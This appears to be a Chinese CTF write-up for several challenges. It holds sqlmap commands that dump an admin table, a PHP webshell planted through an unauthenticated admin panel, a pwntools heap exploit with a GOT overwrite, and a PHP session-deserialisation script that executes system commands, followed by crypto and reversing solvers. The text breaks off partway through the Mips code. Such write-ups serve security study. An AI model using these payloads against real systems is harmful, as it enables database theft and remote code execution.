尝试多次询问即可
xiaohuanxiong
下发容器后需要先执行http://39.106.48.123:44724/install安装cms
后台http://39.106.48.123:44724/admin
sql注入点:sqlmap -u "http://39.106.48.123:44724/search?keyword=1"
管理员用户:sqlmap -u "http://39.106.48.123:44724/search?keyword=1" -D xiaohuanxiong -T e86ca84c_admin -C id,password,username --dump --batch
密码加密方式:md5+salt
网站源码:GitHub - funclown/xiaohuanxiong
问题:目前这个salt不知道系统安装的时候设置成啥了
http://39.107.90.219:32957/admin/admins
后续发现未授权访问后台,直接访问后台,审计相关功能
支付管理页面可以看到右侧可以设置php代码(本来就有一段php代码),写入一句话木马
使用蚁剑成功连接
PyBlockly
将第一个双引号框放到右边
通过全角绕过
修改内置函数,将len内置函数的返回值替换为总返回1的匿名函数,命令执行读取flag,构造payload
easy_heap
libc2.35打iofile
from pwn import *
import argparse
context.log_level = "debug"  # log every send/recv; handy when a menu prompt does not match
conn = remote('47.93.15.136',32860)  # challenge instance from the writeup
libc_lib = ELF('libc-2.35.so', checksec=False)  # libc shipped with the challenge (see the libc2.35 note above); its symbols drive the leak arithmetic below
binary = ELF('./pwn', checksec=False)  # loaded but not referenced further in this snippet
def create_item(size):
    """Menu option 1: ask the program to allocate a commodity of `size` bytes."""
    dialogue = (
        (b'Enter your choice: ', b'1'),
        (b'Enter your commodity size \n', str(size).encode()),
    )
    for prompt, answer in dialogue:
        conn.sendlineafter(prompt, answer)
def remove_item(index):
    """Menu option 2: free the commodity stored at `index`."""
    choose, which = b'Enter your choice: ', b'Enter which to delete: \n'
    conn.sendlineafter(choose, b'2')
    conn.sendlineafter(which, str(index).encode())
def update_item(index, content):
    """Menu option 3: replace the contents of commodity `index`.

    `content` goes through str() before encoding, so passing bytes would send
    their repr (b'...') rather than the raw bytes.
    """
    steps = [
        (b'Enter your choice: ', b'3'),
        (b'Enter which to edit: \n', str(index).encode()),
        (b'Input the content \n', str(content).encode()),
    ]
    for prompt, payload in steps:
        conn.sendlineafter(prompt, payload)
def display_item(index):
    """Menu option 4: show commodity `index` and return what the program prints.

    Everything between the 'The content is here' line and the next menu
    banner is returned, minus the 6-byte b'Menu:\\n' marker itself.
    """
    choose, which = b'Enter your choice: ', b'Enter which to show: \n'
    conn.sendlineafter(choose, b'4')
    conn.sendlineafter(which, str(index).encode())
    conn.recvuntil(b'The content is here \n')
    shown = conn.recvuntil(b'Menu:\n')
    return shown[:-6]
def hidden_function():
    """Menu option 5 (the 'hidden' entry, going by its name), answered with 2."""
    reply = b'2'
    conn.sendlineafter(b'Enter your choice: ', b'5')
    conn.sendlineafter(b'Maybe you will be sad !\n', reply)
def custom_function(target_addr, content):
    """Menu option 10: send a raw address, then raw content (used below as a write primitive).

    Both arguments are sent as-is — no newline is appended to `content` —
    so callers pack them with p64() first.
    """
    send_after = conn.sendafter
    conn.sendlineafter(b'Enter your choice: ', b'10')
    send_after(b'Input your target addr \n', target_addr)
    conn.send(content)
# Four large allocations (sizes well above the small-bin range).
create_item(0x628)
create_item(0x618)
create_item(0x638)
create_item(0x618)
# Free item 1 and then display it: the program still prints a chunk it has
# already freed (use-after-free read), so its first 8 bytes hold a libc
# pointer.  The +0x9c0 correction turns that pointer into the address of
# _IO_2_1_stderr_ for this libc build; presumably an unsorted-bin link — the
# constant is empirical and only valid for libc-2.35 as shipped here.
remove_item(1)
libc_lib.address = u64(display_item(1)[:8]) + 0x9c0 - libc_lib.sym['_IO_2_1_stderr_']
success("libc_lib.address = " + hex(libc_lib.address))
# Hard-coded offset (per the variable name, libc's GOT slot for strlen) and a
# write of printf's address into it via option 10.  This write-what-where only
# works because that GOT is writable in the challenge's libc; full RELRO on
# the library would leave the slot read-only after relocation.
got_strlen_addr = libc_lib.address + 0x21a118
custom_function(p64(got_strlen_addr), p64(libc_lib.sym["printf"]))
hidden_function()
conn.interactive()
flag:flag{4a1ae50a-1717-40b2-acbc-f11c0c1f115f}
platform
通过服务器代码发现是php session反序列化
import requests
# Target URL and request parameters (challenge instance from the writeup).
target_url = "http://eci-2ze51w201x5hnagalpj4.cloudeci1.ichunqiu.com:80"
query_params = {'cmd': "/readflag"}
# auth_token carries a PHP session-serialisation string.  The writeup above
# identifies the bug as PHP session deserialisation: the server unserialize()s
# session content the client can influence.  Feeding user-controlled data to
# unserialize() is the root cause; the server-side fix is to never do so
# (a JSON/plain serialiser and strict session handling avoid the class).
form_data = {
    'auth_token': ';session_id|O:15:"notouchitsclass":1:{s:4:"data";s:24:"("sys"."tem")($_GET[cmd]);";}auth_token|s:1:"c"',
    'login_user': 'arbitrarycommandexecution'
}
# Request headers
request_headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'Cache-Control': 'no-cache',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Pragma': 'no-cache',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
}
# Loop until the flag is found (no delay between attempts; a RequestException
# is printed and the loop simply starts over).
while True:
    # A fresh session per attempt, so no cookies carry over from the last try.
    session_instance = requests.Session()
    try:
        # Two POSTs to /index.php, trying to plant the payload in the session.
        # NOTE: verify=False has no effect here — the target is plain http://.
        for _ in range(2):
            session_instance.post(
                target_url + '/index.php',
                headers=request_headers,
                params=query_params,
                data=form_data,
                verify=False,
                allow_redirects=False
            )
        # POST to /dashboard.php, trying to trigger the payload and read the flag.
        response_flag = session_instance.post(
            target_url + '/dashboard.php?cmd=/readflag',
            headers=request_headers,
            verify=False,
            allow_redirects=False
        )
        # Stop at the first response body that mentions "flag".
        if "flag" in response_flag.text:
            print("Flag found:")
            print(response_flag.text)
            print("Cookies:")
            print(session_instance.cookies)
            break
    except requests.RequestException as e:
        print(f"Request error: {e}")
    finally:
        # Runs on every iteration, including the successful one before `break`.
        session_instance.close()
flag:flag{720c420b-3bd3-4681-bf17-8b18dea58010}
21_steps
直接问chatgpt
from pwn import *
import re
import random
# Connect to the challenge address and port (left blank here — fill in before running)
io = remote('', )
# Send the predefined command.  It is the classic SWAR popcount of a 128-bit
# value: the three big constants are the 0x5555…, 0x3333… and 0x0f0f… masks
# ((2**128-1)/3, /5 and /17), followed by the shift-and-add folding down to a
# 7-bit count (B&127) and a final copy into A.  It uses 20 statements, under
# the checker's budget of 21, and only the 1-cost operators.
command = '''B=A>>1;B=B&113427455640312821154458202477256070485;B=A-B;A=B&68056473384187692692674921486353642291;B=B>>2;B=B&68056473384187692692674921486353642291;B=B+A;A=B>>4;B=B+A;B=B&20016609818878733144904388672456953615;A=B>>8;B=B+A;A=B>>16;B=B+A;A=B>>32;B=B+A;A=B>>64;B=B+A;B=B&127;A=B+0;'''
print(command)
io.sendline(command)
io.interactive()
# Server-side checker for the challenge as quoted in the writeup (`flag` is
# defined elsewhere on the server; it is not part of this snippet).
# Whitelist: every statement must look like  <A|B|int>=<A|B|int><op><A|B|int>
pattern = r'([AB]|\d+)=([AB]|\d+)(\+|\-|\*|//|<<|>>|&|\^|%)\s*([AB]|\d+)'
# Read command from input
command = input("Enter your command: ").strip()
# NOTE: both validations are `assert` statements, which python -O strips —
# they would silently vanish in an optimised run.
assert command[-1] == ';' # Ensure command ends with semicolon
# Validate each operation in the command
assert all([re.fullmatch(pattern, i) for i in command[:-1].split(';')])
# Step budget: shift/add/sub/and/xor cost 1, mul/div/mod cost 3.  '//' passes
# the regex but is in neither list, so it is not charged — likely an oversight.
step = 21
for i in command[:-1].split(';'):
    # strip operands, '=' and spaces so only the operator remains
    t = i.translate(str.maketrans('', '', '=AB0123456789 '))
    if t in ['>>', '<<', '+', '-', '&', '^']:
        step -= 1
    elif t in ['*', '/', '%']:
        step -= 3
    if step < 0:
        print("Step limit exceeded.")
        exit()
success = 0
# Function to count the number of 1s in the binary representation (popcount)
w = lambda x: sum([int(i) for i in list(bin(x)[2:])])
# Test the command with 100 random values of A
for _ in range(100):
    A = random.randrange(0, 2**128)
    wa = w(A)
    B = 0
    try:
        # exec() on user-supplied text: the regex whitelist above is the only
        # thing confining this to arithmetic on A and B; any gap in that
        # pattern turns the checker into arbitrary code execution.
        exec("global A; global B;" + command)
    except Exception as e:
        print(f"Error during execution: {e}")
        exit()
    if A == wa:
        success += 1
# If successful with all 100 tests, print the flag
if success == 100:
    print(flag)
apbq
盘问chatgpt
from Crypto.Util.number import *
from sympy import symbols, solve, Matrix
from sympy import mod_inverse
from Crypto.Util.number import long_to_bytes, getRandomNBitInteger
import gmpy2
import itertools
import itertools
from Crypto.Util.number import long_to_bytes
# --- first stage (plain sympy) ---
# `hints` here is p + q: the quadratic solved below has p and q as its roots.
hints =18978581186415161964839647137704633944599150543420658500585655372831779670338724440572792208984183863860898382564328183868786589851370156024615630835636170
n,e =(89839084450618055007900277736741312641844770591346432583302975236097465068572445589385798822593889266430563039645335037061240101688433078717811590377686465973797658355984717210228739793741484666628342039127345855467748247485016133560729063901396973783754780048949709195334690395217112330585431653872523325589, 65537)
enc1 =23664702267463524872340419776983638860234156620934868573173546937679196743146691156369928738109129704387312263842088573122121751421709842579634121187349747424486233111885687289480494785285701709040663052248336541918235910988178207506008430080621354232140617853327942136965075461701008744432418773880574136247
# Step 1: recover p and q as the roots of x^2 - (p+q)*x + p*q
x = symbols('x')
roots = solve(x**2 - hints*x + n, x)
p, q = roots
print(f'p = {p}')
print(f'q = {q}')
# Step 2: private exponent d = e^-1 mod phi(n)
phi_n = (p-1) * (q-1)
d = mod_inverse(e, phi_n)
print(f'd = {d}')
# Step 3: decrypt enc1 (textbook RSA, no padding)
flag0 = pow(enc1, d, n)
flag0_bytes = long_to_bytes(flag0)
# flag1 is consumed by the final print of the lattice stage further down
flag1 = flag0_bytes.decode()
print(f'flag[0] = {flag0_bytes}')
# Challenge-provided values for the second stage: the hints list (this
# rebinds the scalar `hints` used above), the second public key and enc2.
hints = [18167664006612887319059224902765270796893002676833140278828762753019422055112981842474960489363321381703961075777458001649580900014422118323835566872616431879801196022002065870575408411392402196289546586784096, 16949724497872153018185454805056817009306460834363366674503445555601166063612534131218872220623085757598803471712484993846679917940676468400619280027766392891909311628455506176580754986432394780968152799110962, 17047826385266266053284093678595321710571075374778544212380847321745757838236659172906205102740667602435787521984776486971187349204170431714654733175622835939702945991530565925393793706654282009524471957119991, 25276634064427324410040718861523090738559926416024529567298785602258493027431468948039474136925591721164931318119534505838854361600391921633689344957912535216611716210525197658061038020595741600369400188538567, 22620929075309280405649238349357640303875210864208854217420509497788451366132889431240039164552611575528102978024292550959541449720371571757925105918051653777519219003404406299551822163574899163183356787743543, 20448555271367430173134759139565874060609709363893002188062221232670423900235907879442989619050874172750997684986786991784813276571714171675161047891339083833557999542955021257408958367084435326315450518847393, 16581432595661532600201978812720360650490725084571756108685801024225869509874266586101665454995626158761371202939602347462284734479523136008114543823450831433459621095011515966186441038409512845483898182330730, 23279853842002415904374433039119754653403309015190065311714877060259027498282160545851169991611095505190810819508498176947439317796919177899445232931519714386295909988604042659419915482267542524373950892662544, 16542280976863346138933938786694562410542429842169310231909671810291444369775133082891329676227328401108505520149711555594236523078258701726652736438397249153484528439336008442771240980575141952222517324476607, 
17054798687400834881313828738161453727952686763495185341649729764826734928113560289710721893874591843482763545781022050238655346441049269145400183941816006501187555169759754496609909352066732267489240733143973, 22115728663051324710538517987151446287208882441569930705944807337542411196476967586630373946539021184108542887796299661200933395031919501574357288914028686562763621166172668808524981253976089963176915686295217, 19324745002425971121820837859939938858204545496254632010818159347041222757835937867307372949986924646040179923481350854019113237172710522847771842257888083088958980783122775860443475680302294211764812636993025, 17269103712436870749511150569030640471982622900104490728908671745662264368118790999669887094371008536628103283985205839448583011077421205589315164079023370873380480423797655480624151812894997816254147210406492, 17365467616785968410717969747207581822018195905573214322728668902230086291926193228235744513285718494565736538060677324971757810325341657627830082292794517994668597521842723473167615388674219621483061095351780, 20823988964903136690545608569993429386847299285019716840662662829134516039366335014168034963190410379384987535117127797097185441870894097973310130525700344822429616024795354496158261293140438037100429185280939, 19068742071797863698141529586788871165176403351706021832743114499444358327620104563127248492878047796963678668578417711317317649158855864613197342671267006688211460724339403654215571839421451060657330746917459, 20089639597210347757891251257684515181178224404350699015820324544431016085980542703447257134320668961280907495580251880177990935443438799776252979843969984270461013888122703933975001704404129130156833542263882, 22344734326131457204500487243249860924828673944521980798994250859372628295695660076289343998351448667548250129358262592043131205967592613289260998148991388190917863322690137458448696392344738292233285437662495, 
22688858027824961235755458925538246922604928658660170686458395195714455094516952026243659139809095639584746977271909644938258445835519951859659822660413616465736923822988993362023001205350387354001389518742538, 21286046487289796335501643195437352334100195831127922478044197411293510360710188581314023052580692810484251118253550837525637065385439859631494533102244585493243972819369812352385425700028640641292410326514111, 21542729548465815605357067072323013570796657575603676418485975214641398139843537820643982914302122976789859817102498484496409546012119998359943274203338400776158986205776474024356567247508744784200354385060666, 22319592382753357951626314613193901130171847776829835028715915533809475362288873045184870972146269975570664009921662023590318988850871708674240304838922536028975978222603171333743353770676344328056539379240160, 25195209191944761648246874631038407055240893204894145709996399690807569652160721616011712739214434932639646688187304865397816188999592774874989401871300784534538762135830014255425391132306536883804201055992313, 18257804244956449160916107602212089869395886846990320452133193087611626919926796845263727422042179229606817439442521540784268169177331707314788427670112999551683927934427716554137597798283300120796277229509678, 20293403064916574136692432190836928681820834973375054705153628740577159076332283715581047503287766236543327123639746352358718218140738999496451259789097826888955418315455420948960832865750253988992454128969953, 15967654820584966012628708475666706277218484919923639492431538068059543232562431059752700377242326527417238151501168940191488179144049286512652111172149113549072003881460743035279388672984805823560897688895124, 25144187979876039024245879200325843092774389926620026124061775431569974232758799200333888039013494603721065709195353330350750055309315207499741437181094874894647736904055829877859906318073991986020178158776286, 
15736932921640444103019961538951409924080453868073105830403926861058056351553271238438325117113945341892868641345117717666354739204401152657265824568724844930574396801692131746182948347887298330990039956813130, 18831072673439732764722762485733622234889447953507582396819704359771208236721692820362137219509611319088756045211407777880521726782697895768017460064889670066178710804124631128581556314122255564861269062385337, 23800437561684813552661749774840752013501533683948618798811470214669024646396165487093720960221009038817909066075238937189371227098032581450466402462014437421254375846263830927945343485988463525070074913720710, 24402191070622494792723290726249952159888270689258801831518209605331984684494095167423722682814769395395011136124403802097229547003802312444913008194461779426175966774202219703164060353710247619639616444797670, 20215481513831963554421686543560596857659844027486522940060791775984622049024173363533378455076109165728144576719015392033536498353094895564917644840994662704362121549525329105205514332808950206092190939931448, 18384453917605955747212560280232547481041600196031285084598132475801990710125754705645482436436531608696373462641765399622296314590071558616193035939108523357020287896879479452040171765916716377102454266933226, 21890401344164908103930010123434944359446535642544335610455613014563290097498740447164765588532234051104173227090428486681237432196639010849051113283297943367655458678533223039415083212229970648958070799280218, 18379893441293694747570620009241814202936873442370354246029979042247705730610190888710981918183390028386451290137755339890329474403224043675724851314770861939082447728194632548864823398818221526652331319263027, 18715827130228986951360013590464775001019026913384718876134449689773600060962392738619405370033085704046027397895627933844824630723286144367800484157574548819065406118338665931032779491897783504790669824301288, 
13588739911708699123450670852772302012518315143187739886523841133752009403411431627334135210166268158490674049617489193734568451811305631563767138879895461211915128972052001136464325219117009268526575020143259, 18506039912943821193373920483847347155611306173368341979655092778147169768984477236224526786441466933360500418090210912574990962709452725122792963919616633389125605160796446674502416801964271004625701238202575, 22167985517547342184812919437069844889650448522260359154086923601900060998572245598167213217022051141570075284051615276464952346620430587694188548679895095556459804921016744713098882496174497693878187665372865, 21507363933875318987283059841465034113263466805329282129011688531718330888226928182985538861888698160675575993935166249701145994333840516459683763957425287811252135418288516497258724668090570720893589001392220, 20250321586608105267884665929443511322540360475552916143405651419034772061789298150974629817817611591100450468070842373341756704300393352252725859102426665187194754280129749402796746118608937061141768301995522, 16104259151024766025645778755951638093681273234415510444173981198301666343334808614748361662637508091511498829253677167171091582942780017355912433497214576425697459483727777273045993446283721290714044600814203, 14560242181138184594433372530956542527312169507277535425067427080573272033961044062335960097446781943943464713852520415535775461964590009720592053626735276833191667395201287169782350381649400286337671320581068, 16239347596615402699390026749150381714807445218767496868569282767673828662340774349530405347667558555781433774705139593469838946201218537641296949822639509296966092138954685186059819628696340121356660166937131, 21344472317634795288252811327141546596291633424850284492351783921599290478005814133560171828086405152298309169077585647189366292823613547973428250604674234857289341613448177246451956695700417432794886277704716, 
16053809990112020217624905718566971288375815646771826941011489252522755953750669513046736360397030033178139614200701025268874379439106827823605937814395162011464610496629969260310816473733828751702925621950679, 18917855883623050190154989683327838135081813638430345099892537186954876489710857473326920009412778140451855952622686635694323466827034373114657023892484639238914593012175120540210780102536003758794571846502397, 22690171278715056779052233972642657173540399024770527983659216197108042021644328773010698851143953503599329885607621773816718008861742027388432534850163666629476315340137626681994316866368449548292328156728206, 21087818524872480052313215092436868441694786060866149491087132591272640372512484925209820065536439188250579925233059144898601140234767300574307770064543499923712729705795392684173268461519802573563186764326797, 18439753470094841291394543396785250736332596497190578058698960152415339036714664835925822942784700917586270640813663002161425694392259981974491535370706560550540525510875465091384383255081297963169390777475352, 20105719699015744146039374208926740159952318391171137544887868739518535254000803811729763681262304539724253518465850883904308979964535242371235415049403280585133993732946919550180260852767289669076362115454200, 17251599484976651171587511011045311555402088003441531674726612079301412643514474016351608797610153172169183504289799345382527665445027976807805594288914226822374523878290416047130731166794970645275146679838899, 23027331991437585896233907022469624030630702237261170259290872847355304456043379238362120518409085840638396736666056992747627271193089116095167049248270541979716594671069985183070290375121270398623215587207529, 18158149685496169798299129683009221264185608469410295069411669832919646968324946121757411511373498747604679198739125835462814352243797919744572086307939585501566092705355693015625009717017077302201663788208609, 
18276153196656501517216055049560959047263892309902154534799806637704337317207294332426798932144785240877892837491213916540255237702169595754963908689566362060228840286531616263506272071630209104758589482803348, 19830654702835464289082520892939657653574451119898587213320188332842291005863699764597454403874285715252681820027919359194554863299385911740908952649966617784376852963552276558475217168696695867402522508290055, 15349828226638644963106414986240676364822261975534684137183044733508521003843559094515387144949811552173241406076270015291925943459603622043168219534080772937297911323165839870364550841685270125556125756627553, 20923687596111161976478930953796496927811701530608223491138786355445002217973253897724452954815797952200740069102515860924306246841340715110620719064010080520601890251137419840158983682372232110885549732743013, 21095748006022412831703352650023882351218414866517568822818298949510471554885207645049385966827210564667371665855668707424105040599599901165292360321667007968065708796593851653085339928947755081203265281357013, 20136320433636422315432754195821125224777716034031656342233368000257459497472596860252592531939146543685406198978058242599116859263546329669263543660114747385041549283367183026001454445297981439938401547228229, 16496919752274418275948572022974868132658743151124597724312835413857298109100258912203517423633396955060591787380445877361136405137884456764770035346437177846666365911942996404514058688909577420388537479730705, 13788728438272498164727737074811797093818033799836159894472736480763530670013682288670889124484670336660448907074673625466218166413315342420667608074179975422284472184048790475129281850298519112884101776426380, 24852871485448795332267345793743281093931161235481251209948049584749441451621572752080662697610253315331335180611651946374137068256112152253681972406000252076016099200912670370417045090034045383991812756120791, 
18663346319122078996775762643035864683521213720864038756854558668694021987970601131985163948257100423991091156649638455828855082098689641225427227191064496066436196910238564311309556938903101074363279783438714, 21400068681031931459396470039651524575262457489792894764406364952394476440804779651233022862527636114968325782197380721095406628084183336358459476006267416033892771932528688312375109463803215034905281657962293, 16044158155847172030103761204572942507195578382208455423846603003318483484698088948486132040995746837257705704187725306831142305215342467016564452582165866039427184607605673304595194959499145031211096109534167, 16518253246325822837502418827700493807621067058438396395472266350036385535241769917459657069911028720968654253735107131282350340465691670072304718987805883113410923109703284511709226857412404454224134480632696, 22032469066601123287586507039704080058983969235246539501189720236880312024198451198788699002335010120658564926677243708367430773661097221076615953342733896063909953602379936312639192315223258556134958059637605, 17474611942177808070315948910226643697957069578572244709354155010512694059987765040746148981545760660371360975936526076852619987733316042847813177383519241505024635332293992920023420060610648140841369822739716, 20097265939024591617239874622716452182434300498447992668997438018575636772416262543204370899462096267444545094719202447520254303983442269757551626971917981420832391886214473318353984504467919530676605744560570, 18170251482705061226968041449812078923477452841162650888922564215790088545936753453513162197661916172215859504545409274440450807677845894292177296835154674774694992388033874349807244020099167681146357128785394, 18084007437523118129421476751918491055914528331902780911288404344016551650138679157754567938593688369062981279371320169939281882307797009116458871503759873023914718337944953764426183937635379280572434676575757, 
17001811604221128900675671565539617923973183364469396458234914432162200119518252971721448274846235879320362924206656971472493711107677598961463553324277826426691784458674010708635756004550789902368338633272118, 20217009574515126619724139485885721324936960849401637840860565569588595992087537454744066905387396266844236387315004915383456736142307523960394594650088663019228826091309049211780607761862663242437656610298243, 25534440916970201550118006203706860249111087748000550226680885431006136131742280963090650607632467666558508520152535105122661615376298673454198064361094319699307084117001019115669670029195171047304283891069792, 18871869316294018605789169171879572816494092699556970507058691345095743053290043643010965660058888064972257990750611470141816041727746767146945121588515830427165739580791663951175220638901672353681640741068573, 20173968537913641339915058056878181363456579537994317562789857397928196160113042659777558550242315788417022891612723148843142958668959046890197219991727894451795438138592005695329607326086644956073759609743066, 20601943394990265144021144365970164017319737300436518536503270346147112565303361487668388700369636611354280332841812324530501569200031186584749278453651172121161814207025650519637781007286435981682228528706305, 16397528630087028144645213166977866073543422560337716097539091258081008408890966764995645782823950721804205427713461441138000880478364026137452291234097219085473748076681729365744710225699866258812642458184750, 21373350333568141000876969785296802670776508778278005158047105058430550665787088265486222905402690421155861103648370249249790560185790723042867282734693553039477436055775198037042047438047898227097749354619822, 17767469767416052322357795736899648760868316512079849340028040817353808899589201201338152114229279980849491049574543361275046276135253417685681262008211582060955974064559129311524323185960856955462761555353091, 
22148352529815091269441663541923247974004854058764556809596705832663604786920964849725772666340437231503146814919702525852955831173047034475925578238466977606367380212886384487294569287202762127531620290162734, 21663842528026621741414050256553652815372885707031383713657826718944735177083300302064509342116651731671570591336596953911570477161536730982887182434407761036442993588590230296643001682944654490645815177777455, 20219077358929317461660881724990436334639078047412693497584358963241840513748365548465302817975329987854784305275832045889690022909383530837382543579292451297269623663257098458645056099201050578472103957851128, 18255302182526662903763852563401346841065939531070045000414364747445988455597258924280193695407035356029557886165605853810182770534711966292253269625917149411889979307227493949293798772727125069093642134972336, 24926064145128749429079117171467042019887257504329103038171762786986349157515552927216574990423327013202735544601170247730647598931030432792167867343343213411600516855009788294067588153504026267213013591793027, 22369607314724468760253123915374991621544992437057652340350735935680183705467064876346663859696919167243522648029531700630202188671406298533187087292461774927340821192866797400987231509211718089237481902671100, 16994227117141934754898145294760231694287000959561775153135582047697469327393472840046006353260694322888486978811557952926229613247229990658445756595259401269267528233642142950389040647504583683489067768144570, 21758885458682118428357134100118546351270408335845311063139309657532131159530485845186953650675925931634290182806173575543561250369768935902929861898597396621656214490429009706989779345367262758413050071213624, 20156282616031755826700336845313823798147854495428660743884481573484471099887576514309769978525225369254700468742981099548840277532978306665910844928986235042420698332201264764734685502001234369189521332392642, 
23291765247744127414491614915358658114280269483384022733002965612273627987872443453777028006606037159079637857473229879140366385523633075816362547967658930666106914269093225208138749470566410361196451552322613, 19807792217079652175713365065361659318870738952921195173619551645956745050506271953949139230097128034416815169649874760890189515620232505703162831090225715453502422905418824316957257395992121750661389503495033, 22074209373194902539215367382758486068533032275912313703269990627206774967653336496619231924013216321042649461711292555464574124714934511202231319963361912937842068483700298097209400217869036338644607607557860, 19678336511265998427322297909733474384702243426420286924671444552444079816707773485084891630780465895504253899943221044355971296122774264925882685351095921532685536165514189427245840338009573352081361238596378, 24746314790210393213546150322117518542380438001687269872679602687597595933350510598742749840102841364627647151669428936678130556027300886850086220074563664367409218038338623691372433831784916816798993162471163, 19346137206512895254202370018555139713690272833895195472766704715282164091959131850520571672509601848193468792313437642997923790118115476212663296111963644011010744006086847599108492279986468255445160241848708, 22739514514055088545643169404630736699361136323546717268615404574809011342622362833245601099992039789664042350284789853188040159950619203242924511038681127008964592137006103547262538912024671048254652547084347, 21491512279698208400974501713300096639215882495977078132548631606796810881149011161903684894826752520167909538856354238104288201344211604223297924253960199754326239113862002469224042442018978623149685130901455, 19381008151938129775129563507607725859173925946797075261437001349051037306091047611533900186593946739906685481456985573476863123716331923469386565432105662324849798182175616351721533048174745501978394238803081, 
19965143096260141101824772370858657624912960190922708879345774507598595008331705725441057080530773097285721556537121282837594544143441953208783728710383586054502176671726097169651121269564738513585870857829805]
n, e = (73566307488763122580179867626252642940955298748752818919017828624963832700766915409125057515624347299603944790342215380220728964393071261454143348878369192979087090394858108255421841966688982884778999786076287493231499536762158941790933738200959195185310223268630105090119593363464568858268074382723204344819, 65537)
enc2 =30332590230153809507216298771130058954523332140754441956121305005101434036857592445870499808003492282406658682811671092885592290410570348283122359319554197485624784590315564056341976355615543224373344781813890901916269854242660708815123152440620383035798542275833361820196294814385622613621016771854846491244
# --- second stage: SageMath, not plain Python.  `2^800` is exponentiation
# here (in CPython `^` is XOR), and matrix / identity_matrix / gcd and the
# .LLL() method are Sage builtins. ---
V = hints[:4]
k = 2^800
# Build the lattice [k*V | I] and LLL-reduce it; the scaled first column
# forces the reduced rows to be small integer relations among the four hints.
M = matrix([[k * v for v in V]]).transpose().augment(identity_matrix(len(V)))
B = [b[1:] for b in M.LLL()]
# Second reduction on the relations just found, keeping only rows whose
# leading len(V)-2 entries are all zero.
M = (k * matrix(B[:len(V) - 2])).transpose().augment(identity_matrix(len(V)))
B = [b[-len(V):] for b in M.LLL() if set(b[:len(V) - 2]) == {0}]
# Try small combinations of the two surviving vectors; the gcd with n picks
# out the one that shares a factor with n.  (a3, a4 are unpacked but unused.)
for s, t in itertools.product(range(4), repeat=2):
    T = s*B[0] + t*B[1]
    a1, a2, a3, a4 = T
    kq = gcd(a1 * hints[1] - a2 * hints[0], n)
    if 1 < kq < n:
        print('find!', kq, s, t)
        break
# NOTE: if no (s, t) works, kq is simply the last gcd computed (1 or n) and
# the arithmetic below yields garbage rather than an error.
# Strip small cofactors (all i <= 2**16) from kq so that only the prime q is left.
for i in range(2**16, 1, -1):
    if kq % i == 0:
        kq //= i
q = int(kq)
p = int(n // kq)
d = pow(0x10001, -1, (p - 1) * (q - 1))
m = pow(enc2, d, n)
flag2 = long_to_bytes(int(m)).decode()
# enc3 is decrypted with the same private key as enc2
enc3 =17737974772490835017139672507261082238806983528533357501033270577311227414618940490226102450232473366793815933753927943027643033829459416623683596533955075569578787574561297243060958714055785089716571943663350360324047532058597960949979894090400134473940587235634842078030727691627400903239810993936770281755
flag3 = long_to_bytes(int(pow(int(enc3), int(d), int(n)))).decode()
# flag1 comes from the sympy stage above
print(flag1 + flag2 + flag3)
Mips:
逆向分析可知,结果和原文是一一对应关系,直接尝试爆破,在 xor=0x0a 时得到 flag
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
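unsigned char deadbeef[256] = {0xDE, 0xAD, 0xBE, 0xEF};

/*
 * Encrypt the 22 bytes input[5] .. input[26] into a freshly malloc'd
 * 256-byte buffer, of which only the first 22 bytes are meaningful.
 *
 * Each round updates a local copy of SBox (an RC4-style swap driven by the
 * counters v7/v8 that does not depend on the input), pushes one input byte
 * through a fixed chain of rotates and xors, and mixes in the 4-byte
 * `deadbeef` key; the `xor` byte is then applied to every output byte.
 * Because SBox is a local array it is reset on every call, so enc() is
 * deterministic and output byte j depends only on input[j + 5] — which is
 * what lets main() brute-force one byte at a time.
 *
 * The caller owns the returned buffer and must free() it.
 * Returns NULL if malloc fails.
 */
char *enc(char *input, int xor) {
    unsigned char SBox[256] = {0x36, 0x68, 0x32, 0x44, 0x12, 0x61, 0x6f, 0xdf, 0xba, 0xe9, 0x98, 0x28, 0x3d, 0xa8, 0xe6, 0x1e, 0x4d, 0xf2, 0xb1, 0x7e, 0xc2, 0x6a, 0x96, 0x8c, 0x37, 0x19, 0x14, 0x42, 0xa2, 0x11, 0xe5, 0x5b, 0x9d, 0x23, 0x3, 0x83, 0xf8, 0xd8, 0x9, 0x8a, 0x3c, 0x7d, 0x1a, 0x46, 0x49, 0xdc, 0x76, 0x63, 0x3e, 0x4, 0x9a, 0xc, 0x43, 0x4b, 0x72, 0x5f, 0x53, 0x21, 0x74, 0x66, 0x4f, 0xa7, 0xf6, 0x7b, 0x94, 0xa3, 0x47, 0x8f, 0xf4, 0x52, 0x2a, 0x89, 0x30, 0x33, 0x27, 0x2c, 0xf5, 0x75, 0x17, 0x79, 0x5e, 0x7f, 0x9c, 0xcb, 0x55, 0xbb, 0x60, 0x38, 0xb8, 0xd2, 0xd4, 0x8b, 0xbf, 0x1f, 0x41, 0x45, 0x0, 0x82, 0x69, 0x40, 0xe1, 0x9f, 0xe2, 0xd3, 0x4a, 0x1c, 0x71, 0x62, 0x18, 0x24, 0x97, 0x84, 0xa, 0x8e, 0x3f, 0xf, 0x1, 0x86, 0xe, 0x67, 0xc9, 0x99, 0x88, 0xb0, 0x6e, 0x54, 0x92, 0xef, 0x9b, 0xd5, 0xa5, 0xb, 0xdd, 0xbd, 0xae, 0xcc, 0xc8, 0x3a, 0x65, 0x56, 0xe0, 0xf1, 0x6, 0x1b, 0xfa, 0xbc, 0xc4, 0x91, 0xc1, 0x2e, 0x13, 0xf0, 0x58, 0xee, 0xac, 0xec, 0xa6, 0x26, 0x39, 0xb5, 0xaf, 0xc3, 0x10, 0x5a, 0xd, 0x5d, 0x29, 0x15, 0x6b, 0x50, 0xb2, 0xfe, 0xaa, 0x90, 0xa9, 0x51, 0xd0, 0xb6, 0xc6, 0x34, 0xfc, 0xa0, 0xb3, 0x35, 0xea, 0x7, 0xa4, 0x22, 0x80, 0x6d, 0x81, 0x57, 0x87, 0x25, 0xc7, 0x4c, 0xd6, 0xce, 0x77, 0xd7, 0xad, 0x78, 0x7a, 0x85, 0xa1, 0xf3, 0xe8, 0x5c, 0x73, 0x48, 0xda, 0x31, 0x4e, 0x2d, 0x93, 0x16, 0x2, 0x70, 0x1d, 0xfb, 0xcd, 0xe3, 0xf7, 0x64, 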